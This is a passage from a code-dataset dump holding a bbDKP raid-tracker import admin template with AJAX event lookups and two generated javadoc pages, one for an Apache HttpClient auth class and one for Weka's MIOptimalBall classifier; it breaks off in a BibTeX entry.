path stringlengths 5 312 | repo_name stringlengths 5 116 | content stringlengths 2 1.04M |
|---|---|---|
root/adm/style/dkp/acp_rt_import.html | bbDKP/Raidtracker | <!-- INCLUDE overall_header.html -->
<!--
$Id: acp_rt_import.html $
//-->
<style type="text/css" >
fieldset
{
/*background :transparent url(../images/bg_tabs_alt2.gif) no-repeat scroll 100% -35px;*/
/*border-color:#D7D7D7 #CCCCCC #CCCCCC #D7D7D7;*/
border-style:solid;
border-width:0 px;
margin:15px 0;
padding:10px;
position:relative;
}
fieldset dt
{
width: 25%;
text-align: left;
border: none;
border-right: 1px solid #CCCCCC;
padding-top: 3px;
}
fieldset dd
{
margin: 0 0 0 25%;
padding: 0 0 0 5px;
border: none;
border-left: 1px solid #CCCCCC;
vertical-align: top;
font-size: 1.00em;
}
</style>
<script type="text/javascript">
//<![CDATA[
/* make a XMLHTTP Request object */
function GetXmlHttpObject()
{
var xmlhttp=false;
try
{
// IE7+, Firefox, Chrome, Opera, Safari
xmlhttp=new XMLHttpRequest();
}
catch(e)
{ // activex code for IE6, IE5
try
{
xmlhttp= new ActiveXObject("Microsoft.XMLHTTP");
}
catch(e)
{
try
{
xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
}
catch(e1)
{
xmlhttp=false;
}
}
}
return xmlhttp;
}
/* ajax function to find event */
var xmlhttp;
function GetEvent(dkpid)
{
xmlhttp = GetXmlHttpObject();
if (xmlhttp == null)
{
alert("{LA_ALERT_OLDBROWSER}");
return;
}
var strURL="{UA_FINDEVENT}&dkpid="+dkpid;
xmlhttp.onreadystatechange=stateChanged;
xmlhttp.open("GET", strURL, true);
// send to server
xmlhttp.send(null);
}
/* called from GetEvent js when state changed */
function stateChanged()
{
if (xmlhttp.readyState==4) //request complete
{
if (xmlhttp.status == 200)
{
//remove select options
var rsel = document.getElementById('eventselect');
rsel.options.length = 0;
//receive xml from php
var xmlDoc=xmlhttp.responseXML;
var root = xmlDoc.getElementsByTagName('eventlist')[0];
var events = root.getElementsByTagName("event")
var dkpvalue = document.getElementById('dkpvalue');
for (var i = 0; i < events.length; i++)
{
var event = events[i];
var eventid = event.getElementsByTagName("event_id")[0].firstChild.nodeValue;
var eventname = event.getElementsByTagName("event_name")[0].firstChild.nodeValue;
if (event.getElementsByTagName("event_value")[0].firstChild.nodeValue)
{
document.getElementById('dkpvalue').value = event.getElementsByTagName("event_value")[0].firstChild.nodeValue;
}
// add the options to html
rsel.options[i] = new Option(eventname,eventid, true, false);
}
}
else
{
alert("{LA_ALERT_AJAX}:\n" + xmlhttp.statusText);
}
}
}
/* ajax function to get event value from php, triggered from change in event in html */
function GetEventValue(eventid)
{
xmlhttp = GetXmlHttpObject();
if (xmlhttp == null)
{
alert("{LA_ALERT_OLDBROWSER}");
return;
}
var strURL="{UA_FINDEVENT}&eventid="+eventid;
xmlhttp.onreadystatechange=stateChanged2;
xmlhttp.open("GET", strURL, true);
// send to server
xmlhttp.send(null);
}
/* called from GetEventValue js when state changed */
function stateChanged2()
{
if (xmlhttp.readyState==4) //request complete
{
if (xmlhttp.status == 200)
{
document.getElementById("dkpvalue").value=xmlhttp.responseText;
}
else
{
alert("{LA_ALERT_AJAX}:\n" + xmlhttp.statusText);
}
}
}
//]]>
</script>
<h1>{L_RT_STEP2_PAGETITLE}</h1>
<p>{L_RT_IMPORT_EXPLAIN}</p>
<fieldset>
<div id="advanced00">
<div class="permissions-category">
<ul>
<li class="permissions-preset-no">
<a href="{U_PARSE}" onclick=""><span class="tabbg"><span class="colour"></span>{L_RT_STEP1_PAGETITLE}</span></a></li>
<li class="permissions-preset-never activetab">
<a href="{U_IMPORT}" onclick=""><span class="tabbg"><span class="colour"></span>{L_RT_STEP2_PAGETITLE}</span></a></li>
</ul>
</div>
</div>
<div class="permissions-panel" id="options001">
<span class="corners-top"><span></span></span>
<form method="post" action="{F_IMPORT}" id="post">
<fieldset>
<legend><h1>{L_RT_STEP2_RAIDINFO}</h1></legend>
<dl>
<dt><label>{L_GUILD_NAME}:</label></dt>
<dd><select id="guild" name="guild" class="input">
<!-- BEGIN guild_row -->
<option value="{guild_row.ID}"{guild_row.SELECTED}>{guild_row.NAME}</option>
<!-- END guild_row -->
</select>
</dd>
</dl>
<dl>
<dt><label>{L_RT_STEP2_DKPPOOL}:</label></dt>
<dd><select name="dkpsys" class="input" onchange="return GetEvent(this.value)">
<!-- BEGIN dkpsys_row -->
<option value="{dkpsys_row.DKPLISTVALUE}"{dkpsys_row.DKPLISTSELECTED}>{dkpsys_row.DKPLISTOPTION}</option>
<!-- END dkpsys_row -->
</select>
</dd>
</dl>
<dl>
<dt><label>{L_RT_STEP2_EVENT}:</label></dt>
<dd><select id="eventselect" name="event" class="input" onchange="return GetEventValue(this.value)">
<!-- BEGIN eventlist_row -->
<option value="{eventlist_row.EVENTLISTVALUE}"{eventlist_row.EVENTLISTSELECTED}>{eventlist_row.EVENTLISTOPTION}</option>
<!-- END eventlist_row -->
</select>
</dd>
</dl>
<!-- BEGIN allplayers_row -->
<input type="hidden" name="allplayers[{allplayers_row.ID}][name]" value="{allplayers_row.NAME}"/>
<input type="hidden" name="allplayers[{allplayers_row.ID}][guild]" value="{allplayers_row.GUILD}"/>
<input type="hidden" name="allplayers[{allplayers_row.ID}][race]" value="{allplayers_row.RACE}"/>
<input type="hidden" name="allplayers[{allplayers_row.ID}][sex]" value="{allplayers_row.SEX}"/>
<input type="hidden" name="allplayers[{allplayers_row.ID}][class]" value="{allplayers_row.CLASS}"/>
<input type="hidden" name="allplayers[{allplayers_row.ID}][level]" value="{allplayers_row.LEVEL}"/>
<input type="hidden" name="allplayers[{allplayers_row.ID}][join]" value="{allplayers_row.JOIN}"/>
<input type="hidden" name="allplayers[{allplayers_row.ID}][leave]" value="{allplayers_row.LEAVE}"/>
<!-- END allplayers_row -->
<!-- BEGIN raid_row -->
<dl>
<dt><label>{L_RT_STEP2_REALM}</label></dt>
<dd><span>{raid_row.REALM}</span>
<input type="hidden" name="realm" value="{raid_row.REALM}"/>
</dd>
</dl>
<dl>
<dd><input type="hidden" name="batchid" value="{raid_row.BATCHID}" class="input" /></dd>
<dd><input type="hidden" name="dkpsys_id[{raid_row.BATCHID}]" value="{raid_row.DKPSYS}" class="input" /></dd>
<dd><input type="hidden" name="event_id[{raid_row.BATCHID}]" value="{raid_row.EVENT}" class="input" /></dd>
<dd><input type="hidden" name="event_name[{raid_row.BATCHID}]" value="{raid_row.ZONE}" class="input" /></dd>
</dl>
<dl>
<dt><label>{L_RT_STEP2_COMMENT}</label></dt>
<dd>
<textarea name="globalcomments[{raid_row.BATCHID}]" style="float: left" rows="3" cols="15" class="input">{raid_row.NOTE}</textarea>
</dd>
</dl>
<dl>
<dt><label>{L_RT_STEP2_ZONE}</label></dt>
<dd><label><strong>{raid_row.ZONE}</strong></label>
</dl>
<!-- no field in eqdkp export for this -- need new format
<dl>
<input type="radio" name="difficulty[{raid_row.BATCHID}]" value="0"{raid_row.NORM_CHECKED} /> {L_RT_DIFFICULTYNORMAL}
<input type="radio" name="difficulty[{raid_row.BATCHID}]" value="2"{raid_row.FLEX_CHECKED} /> {L_RT_FLEX}
<input type="radio" name="difficulty[{raid_row.BATCHID}]" value="1"{raid_row.HEROIC_CHECKED} /> {L_RT_DIFFICULTYHEROIC}
</dd>
</dl>
-->
<dl>
<dt><label>{L_RT_STEP2_DKPVALUE}</label><br />{L_RT_STEP2_DKPVALUE_EXPLAIN}</dt>
<dd>
<input type="text" id="dkpvalue" name="dkpvalue[{raid_row.BATCHID}]" size="10" value="{raid_row.EVENT_VALUE}" class="input" />
</dd>
</dl>
<dl>
<dt><label>{L_RT_STEP2_RAIDSTART}</label></dt>
<dd>
<input type="text" name="raidstart_d[{raid_row.BATCHID}]" size="3" maxlength="2" value="{raid_row.HRAIDSTART_D}" class="input" />
/<input type="text" name="raidstart_mo[{raid_row.BATCHID}]" size="3" maxlength="2" value="{raid_row.HRAIDSTART_MO}" class="input" />
/<input type="text" name="raidstart_y[{raid_row.BATCHID}]" size="5" maxlength="4" value="{raid_row.HRAIDSTART_Y}" class="input" />
<input type="text" name="raidstart_h[{raid_row.BATCHID}]" size="3" maxlength="2" value="{raid_row.HRAIDSTART_H}" class="input" />
:<input type="text" name="raidstart_mi[{raid_row.BATCHID}]" size="3" maxlength="2" value="{raid_row.HRAIDSTART_MI}" class="input" />
:<input type="text" name="raidstart_s[{raid_row.BATCHID}]" size="3" maxlength="2" value="{raid_row.HRAIDSTART_S}" class="input" />
</dd>
<dt><label>{L_RT_STEP2_RAIDEND}</label></dt>
<dd>
<input type="text" name="raidend_d[{raid_row.BATCHID}]" size="3" maxlength="2" value="{raid_row.HRAIDEND_D}" class="input" />
/<input type="text" name="raidend_mo[{raid_row.BATCHID}]" size="3" maxlength="2" value="{raid_row.HRAIDEND_MO}" class="input" />
/<input type="text" name="raidend_y[{raid_row.BATCHID}]" size="5" maxlength="4" value="{raid_row.HRAIDEND_Y}" class="input" />
<input type="text" name="raidend_h[{raid_row.BATCHID}]" size="3" maxlength="2" value="{raid_row.HRAIDEND_H}" class="input" />
:<input type="text" name="raidend_mi[{raid_row.BATCHID}]" size="3" maxlength="2" value="{raid_row.HRAIDEND_MI}" class="input" />
:<input type="text" name="raidend_s[{raid_row.BATCHID}]" size="3" maxlength="2" value="{raid_row.HRAIDEND_S}" class="input" />
</dd>
</dl>
<dl>
<dt><label>{L_RT_STEP2_ATTENDEES} ({raid_row.TOTALATTENDEESCOUNT}):</label></dt>
<dd><textarea name="allattendees[{raid_row.BATCHID}]" style="float: left" rows="3" cols="15" class="input">{raid_row.ALLATTENDEES}</textarea></dd>
</dl>
<!-- IF S_SHOWTIME -->
<dl>
<dt><label><h1>{L_RT_STEP2_TIMEBONUSCALCULATION}</h1></label><br />{L_RT_STEP2_TIMEBONUSCALCULATION_EXPLAIN}</dt>
<dd>
<table width="100%" border="0" cellspacing="1" cellpadding="2">
<tr>
<th align="left" width="5%" nowrap="nowrap">{L_RT_STEP2_ID}</th>
<th align="left" width="25%">{L_RT_STEP2_NAME}</th>
<th align="left" width="10%" nowrap="nowrap">{L_RT_STEP2_JOINTIME}</th>
<th align="left" width="10%" nowrap="nowrap">{L_RT_STEP2_LEAVETIME}</th>
<th align="left" width="10%" nowrap="nowrap">{L_RT_STEP2_DURATION}</th>
<th align="left" width="10%" nowrap="nowrap">{L_RT_STEP2_BASIS}</th>
<th align="left" width="10%" nowrap="nowrap">{L_RT_STEP2_TIMEBONUS}</th>
</tr>
<!-- BEGIN allplayers_row -->
<!-- IF allplayers_row.S_ROW_COUNT is even -->
<tr class="row1">
<!-- ELSE -->
<tr class="row2">
<!-- ENDIF -->
<td width="5%" nowrap="nowrap" align="right">{raid_row.allplayers_row.ID}</td>
<td width="25%" nowrap="nowrap">{raid_row.allplayers_row.NAME}</td>
<td width="10%" nowrap="nowrap">{raid_row.allplayers_row.JOIN}</td>
<td width="10%" nowrap="nowrap">{raid_row.allplayers_row.LEAVE}</td>
<td width="10%" nowrap="nowrap">{raid_row.allplayers_row.DURATION}</td>
<td width="10%" nowrap="nowrap">{raid_row.allplayers_row.TIMEBASIS}</td>
<td width="10%" nowrap="nowrap"><input type = "text" name="timebonus[{raid_row.BATCHID}][{raid_row.allplayers_row.NAME}]" value = "{raid_row.allplayers_row.TIMEBONUS}" /></td>
</tr>
<!-- END allplayers_row -->
</table>
</dd>
</dl>
<!-- ENDIF -->
<h1>{L_RT_STEP2_RAIDSDROPSDETAILS}</h1>
<!-- BEGIN boss_row -->
<div class="panel">
<div class="inner">
<span class="corners-top"><span></span></span>
<strong>{boss_row.BOSSNAME}</strong>
<fieldset class="fields2">
<dl>
<dd>
<input type="hidden" name="boss[{raid_row.BATCHID}][{boss_row.BOSSNAME}][name]" value="{raid_row.boss_row.BOSSNAME}" class="input" />
<!--
no way to know this from dkp string
<input type="radio" name="bossdifficulty[{raid_row.BATCHID}][{boss_row.BOSSNAME}]" value="0"{raid_row.boss_row.BOSSNORM_CHECKED} /> {L_RT_DIFFICULTYNORMAL}
<input type="radio" name="bossdifficulty[{raid_row.BATCHID}][{boss_row.BOSSNAME}]" value="1"{raid_row.boss_row.BOSSHEROIC_CHECKED} /> {L_RT_DIFFICULTYHEROIC}
-->
</dd>
</dl>
<dl>
<dt><label>{L_RT_STEP2_DKPVALUE}</label><br />{L_RT_STEP2_BOSSVALUE_EXPLAIN}</dt>
<dd>
<input type="text" id="bossvalue" name="boss[{raid_row.BATCHID}][{boss_row.BOSSNAME}][bossvalue]" size="10" value="{raid_row.boss_row.BOSSVALUE}" class="input" />
</dd>
</dl>
<dl>
<dt><label>{L_RT_STEP2_KILLTIME}</label></dt>
<dd>
<input type="text" name="boss[{raid_row.BATCHID}][{boss_row.BOSSNAME}][kill_d]" size="3" maxlength="2" value="{raid_row.boss_row.BOSSKILL_D}" class="input" />
/<input type="text" name="boss[{raid_row.BATCHID}][{boss_row.BOSSNAME}][kill_mo]" size="3" maxlength="2" value="{raid_row.boss_row.BOSSKILL_MO}" class="input" />
/<input type="text" name="boss[{raid_row.BATCHID}][{boss_row.BOSSNAME}][kill_y]" size="5" maxlength="4" value="{raid_row.boss_row.BOSSKILL_Y}" class="input" />
<input type="text" name="boss[{raid_row.BATCHID}][{boss_row.BOSSNAME}][kill_h]" size="3" maxlength="2" value="{raid_row.boss_row.BOSSKILL_H}" class="input" />
:<input type="text" name="boss[{raid_row.BATCHID}][{boss_row.BOSSNAME}][kill_mi]" size="3" maxlength="2" value="{raid_row.boss_row.BOSSKILL_MI}" class="input" />
:<input type="text" name="boss[{raid_row.BATCHID}][{boss_row.BOSSNAME}][kill_s]" size="3" maxlength="2" value="{raid_row.boss_row.BOSSKILL_S}" class="input" />
</dd>
<dt><label>{L_RT_STEP2_ATTENDEES} ({boss_row.COUNTOFBOSSATTENDEES}):</label></dt>
<dd>
<textarea name="boss[{raid_row.BATCHID}][{raid_row.boss_row.BOSSNAME}][attendees]" style="float: left" rows="3" cols="15" class="input">{raid_row.boss_row.BOSSATTENDEES}</textarea>
</dd>
</dl>
<!-- BEGIN loot_row -->
<dl>
<dt>{L_RT_STEP2_ITEMNAME}</dt>
<dd>
<input type="text" name="bossloot[{raid_row.BATCHID}][{boss_row.BOSSNAME}][{boss_row.loot_row.LOOTNR}][itemname]" size="30" value="{raid_row.boss_row.loot_row.ITEMNAME}" class="input" />{L_RT_STEP2_ITEMID}
<input type="text" name="bossloot[{raid_row.BATCHID}][{boss_row.BOSSNAME}][{boss_row.loot_row.LOOTNR}][itemid]" size="6" value="{raid_row.boss_row.loot_row.ITEMID}" class="input" />
</dd>
<dt>{L_RT_STEP2_LOOTER}</dt>
<dd>
<input type="text" name="bossloot[{raid_row.BATCHID}][{boss_row.BOSSNAME}][{boss_row.loot_row.LOOTNR}][looter]" size="30" value="{raid_row.boss_row.loot_row.PLAYERNAME}-{raid_row.boss_row.loot_row.REALM}" class="input" />
</dd>
<dt>{L_RT_STEP2_DKPCOST}</dt>
<dd>
<input type="text" name="bossloot[{raid_row.BATCHID}][{boss_row.BOSSNAME}][{boss_row.loot_row.LOOTNR}][cost]" size="10" value="{raid_row.boss_row.loot_row.COST}" class="input" />
</dd>
</dl>
<!-- END loot_row -->
</fieldset>
<span class="corners-bottom"><span></span></span>
</div>
</div>
<!-- END boss_row -->
<!-- END raid_row -->
</fieldset>
<div class="tablewrap">
<fieldset class="quick" style="float: {S_CONTENT_FLOW_END};">
<input type="submit" name="doimport" value="{L_RT_IMPORT}" class="button1" />
<input type="reset" name="reset" value="{L_RESET}" class="button2" />
</fieldset>
</div>
</form>
<span class="corners-bottom"><span></span></span>
</div>
</fieldset>
<!-- INCLUDE dkp/overall_footer.html --> |
libraries/httpcomponents-client-4.2.5/javadoc/org/apache/http/impl/auth/class-use/SPNegoScheme.html | jswelker/LibraryH3lp-Transfer-Bot | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.5.0_22) on Fri Apr 19 18:20:47 CEST 2013 -->
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<TITLE>
Uses of Class org.apache.http.impl.auth.SPNegoScheme (HttpComponents Client 4.2.5 API)
</TITLE>
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
parent.document.title="Uses of Class org.apache.http.impl.auth.SPNegoScheme (HttpComponents Client 4.2.5 API)";
}
</SCRIPT>
<NOSCRIPT>
</NOSCRIPT>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../org/apache/http/impl/auth/SPNegoScheme.html" title="class in org.apache.http.impl.auth"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
NEXT</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../../index.html?org/apache/http/impl/auth/class-use/SPNegoScheme.html" target="_top"><B>FRAMES</B></A>
<A HREF="SPNegoScheme.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<HR>
<CENTER>
<H2>
<B>Uses of Class<br>org.apache.http.impl.auth.SPNegoScheme</B></H2>
</CENTER>
No usage of org.apache.http.impl.auth.SPNegoScheme
<P>
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../org/apache/http/impl/auth/SPNegoScheme.html" title="class in org.apache.http.impl.auth"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
NEXT</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../../index.html?org/apache/http/impl/auth/class-use/SPNegoScheme.html" target="_top"><B>FRAMES</B></A>
<A HREF="SPNegoScheme.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<HR>
Copyright © 1999-2013 <a href="http://www.apache.org/">The Apache Software Foundation</a>. All Rights Reserved.
</BODY>
</HTML>
|
doc/weka/classifiers/mi/MIOptimalBall.html | Sufrostico/weka | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_43) on Thu Jul 03 22:07:21 NZST 2014 -->
<TITLE>
MIOptimalBall
</TITLE>
<META NAME="date" CONTENT="2014-07-03">
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="MIOptimalBall";
}
}
</SCRIPT>
<NOSCRIPT>
</NOSCRIPT>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<HR>
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="http://www.cs.waikato.ac.nz/ml/weka/" target="_blank"><FONT CLASS="NavBarFont1"><B>Weka's home</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../weka/classifiers/mi/MINND.html" title="class in weka.classifiers.mi"><B>PREV CLASS</B></A>
<A HREF="../../../weka/classifiers/mi/MISMO.html" title="class in weka.classifiers.mi"><B>NEXT CLASS</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../index.html?weka/classifiers/mi/MIOptimalBall.html" target="_top"><B>FRAMES</B></A>
<A HREF="MIOptimalBall.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: NESTED | <A HREF="#field_summary">FIELD</A> | <A HREF="#constructor_summary">CONSTR</A> | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: <A HREF="#field_detail">FIELD</A> | <A HREF="#constructor_detail">CONSTR</A> | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<HR>
<!-- ======== START OF CLASS DATA ======== -->
<H2>
<FONT SIZE="-1">
weka.classifiers.mi</FONT>
<BR>
Class MIOptimalBall</H2>
<PRE>
java.lang.Object
<IMG SRC="../../../resources/inherit.gif" ALT="extended by "><A HREF="../../../weka/classifiers/Classifier.html" title="class in weka.classifiers">weka.classifiers.Classifier</A>
<IMG SRC="../../../resources/inherit.gif" ALT="extended by "><B>weka.classifiers.mi.MIOptimalBall</B>
</PRE>
<DL>
<DT><B>All Implemented Interfaces:</B> <DD>java.io.Serializable, java.lang.Cloneable, <A HREF="../../../weka/core/CapabilitiesHandler.html" title="interface in weka.core">CapabilitiesHandler</A>, <A HREF="../../../weka/core/MultiInstanceCapabilitiesHandler.html" title="interface in weka.core">MultiInstanceCapabilitiesHandler</A>, <A HREF="../../../weka/core/OptionHandler.html" title="interface in weka.core">OptionHandler</A>, <A HREF="../../../weka/core/RevisionHandler.html" title="interface in weka.core">RevisionHandler</A>, <A HREF="../../../weka/core/TechnicalInformationHandler.html" title="interface in weka.core">TechnicalInformationHandler</A>, <A HREF="../../../weka/core/WeightedInstancesHandler.html" title="interface in weka.core">WeightedInstancesHandler</A></DD>
</DL>
<HR>
<DL>
<DT><PRE>public class <B>MIOptimalBall</B><DT>extends <A HREF="../../../weka/classifiers/Classifier.html" title="class in weka.classifiers">Classifier</A><DT>implements <A HREF="../../../weka/core/OptionHandler.html" title="interface in weka.core">OptionHandler</A>, <A HREF="../../../weka/core/WeightedInstancesHandler.html" title="interface in weka.core">WeightedInstancesHandler</A>, <A HREF="../../../weka/core/MultiInstanceCapabilitiesHandler.html" title="interface in weka.core">MultiInstanceCapabilitiesHandler</A>, <A HREF="../../../weka/core/TechnicalInformationHandler.html" title="interface in weka.core">TechnicalInformationHandler</A></DL>
</PRE>
<P>
<!-- globalinfo-start -->
This classifier tries to find a suitable ball in the multiple-instance space, with a certain data point in the instance space as a ball center. The possible ball center is a certain instance in a positive bag. The possible radiuses are those which can achieve the highest classification accuracy. The model selects the maximum radius as the radius of the optimal ball.<br/>
<br/>
For more information about this algorithm, see:<br/>
<br/>
Peter Auer, Ronald Ortner: A Boosting Approach to Multiple Instance Learning. In: 15th European Conference on Machine Learning, 63-74, 2004.
<p/>
<!-- globalinfo-end -->
<!-- technical-bibtex-start -->
BibTeX:
<pre>
@inproceedings{Auer2004,
author = {Peter Auer and Ronald Ortner},
booktitle = {15th European Conference on Machine Learning},
note = {LNAI 3201},
pages = {63-74},
publisher = {Springer},
title = {A Boosting Approach to Multiple Instance Learning},
year = {2004}
}
